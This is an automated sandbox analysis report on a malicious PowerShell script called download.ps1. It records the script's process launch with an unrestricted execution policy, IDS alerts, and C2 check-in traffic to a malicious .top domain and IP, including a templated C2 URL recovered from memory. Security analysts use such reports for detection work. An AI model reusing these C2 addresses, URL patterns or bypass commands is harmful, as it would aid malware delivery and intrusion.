Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1581181
MD5:7dafb41e8fcb07cd512f09a1b29acfba
SHA1:74f6e01ccfe06425979abab3777793be1cd02653
SHA256:b2081d85f24db02186d3280e7acf429e4fdbe23d98c3543965ec73b7ad4c5e8b
Tags:KongTukeps1user-monitorsg
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7128, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7128, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-27T07:18:10.669795+010020577411A Network Trojan was detected192.168.2.54970445.61.136.13880TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-27T07:18:09.003537+010028594051Domain Observed Used for C2 Detected192.168.2.5525121.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-27T07:18:10.669795+010018100001Potentially Bad Traffic192.168.2.54970445.61.136.13880TCP
2024-12-27T07:18:12.644185+010018100001Potentially Bad Traffic192.168.2.549705142.250.181.6880TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://gajaechkfhfghal.top/26te7apny8htr.php?id=user-PC&key=60099241868&s=527Avira URL Cloud: Label: malware
Source: http://gajaechkfhfghal.topAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: download.ps1ReversingLabs: Detection: 13%
Source: download.ps1Virustotal: Detection: 14%Perma Link
Source: Binary string: softy.pdb source: powershell.exe, 00000000.00000002.2209390732.000001C026E25000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2207985331.000001C026CFD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2206179543.000001C0266E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2207985331.000001C026CFD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2206179543.000001C0266E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.2153725167.000001C00C712000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2207985331.000001C026CF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2153725167.000001C00C712000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2207985331.000001C026D9F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2206179543.000001C0266E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089R source: powershell.exe, 00000000.00000002.2207985331.000001C026CFD000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2859405 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.2.5:52512 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49705 -> 142.250.181.68:80
Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49704 -> 45.61.136.138:80
Source: Network trafficSuricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.5:49704 -> 45.61.136.138:80
Queries Google from non browser process on port 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: global trafficHTTP traffic detected: GET /26te7apny8htr.php?id=user-PC&key=60099241868&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gajaechkfhfghal.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /26te7apny8htr.php?id=user-PC&key=60099241868&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gajaechkfhfghal.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: gajaechkfhfghal.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.2154207173.000001C00E909000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C00FB56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$qgy97hdrmk401l6/$o7znvsrtk05q3hy.php?id=$env:computername&key=$qkxaesfor&s=527
Source: powershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.2207809814.000001C026870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
Source: powershell.exe, 00000000.00000002.2154207173.000001C00FDE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C00FB56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gajaechkfhfghal.top
Source: powershell.exe, 00000000.00000002.2154207173.000001C00FB56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gajaechkfhfghal.top/26te7apny8htr.php?id=user-PC&key=60099241868&s=527
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.2191669510.000001C01E753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2154207173.000001C011698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2154207173.000001C00FE0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C010A08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C010D08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C010D15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C010D3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E94E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E9DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C0109F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.2154207173.000001C00E909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.2154207173.000001C00E6E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2154207173.000001C00E909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.2154207173.000001C010D50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000000.00000002.2154207173.000001C011698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.2154207173.000001C00FDE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C00FDEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C00FE00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.2154207173.000001C00E6E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2191669510.000001C01E6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C010011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E8BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C00FE0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E94E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E9DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.2191669510.000001C01E753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2191669510.000001C01E753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2191669510.000001C01E753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C00FDEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E8BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E94E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.2154207173.000001C011698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2191669510.000001C01E9DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.2154207173.000001C010011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.2191669510.000001C01E6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E8BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C00FE0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E94E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E9DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.2191669510.000001C01E753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2154207173.000001C010D50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.2154207173.000001C010D50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.2154207173.000001C00FE0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024
Source: powershell.exe, 00000000.00000002.2154207173.000001C0109F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gif
Source: powershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifX
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.2154207173.000001C010011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E8BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C00FE0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E94E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E9DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.2154207173.000001C010011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848EA83890_2_00007FF848EA8389
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848EA75660_2_00007FF848EA7566
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848E9EA500_2_00007FF848E9EA50
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848E9EA430_2_00007FF848E9EA43
Source: powershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: }if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="GftoqWXMObjIEQBfsjleVg">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQ/rs\x3dACT90oE4VDuypTCPH8jtHQgPMB8KgoFScQ',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="GftoqWXMObjIEQBfsjleVg">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d'
Source: powershell.exe, 00000000.00000002.2154207173.000001C010011000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
Source: powershell.exe, 00000000.00000002.2154207173.000001C00FDE3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="GftoqWXMObjIEQBfsjleVg">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="GftoqWXMObjIEQBfsjleVg">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQ/rs\x3dACT90oE4VDuypTCPH8jtHQgPMB8KgoFScQ',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="GftoqWXMObjIEQBfsjleVg">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
